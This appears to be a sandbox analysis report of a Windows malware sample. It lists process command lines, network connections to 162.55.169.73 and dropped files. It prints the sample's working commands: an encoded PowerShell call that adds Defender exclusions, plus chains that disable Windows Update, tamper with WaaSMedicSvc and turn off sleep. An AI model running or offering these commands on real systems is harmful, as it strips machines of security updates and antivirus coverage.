powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp

Files

C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ju1w1gkv.agb.ps1

C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe

C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat

C:\driverPerf\cominto.exe

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Windows\system32\drivers\etc\hosts

C:\Windows\Tasks\dialersvc32.job

C:\Windows\Tasks\dialersvc64.job

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\Chrome\updater.exe

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
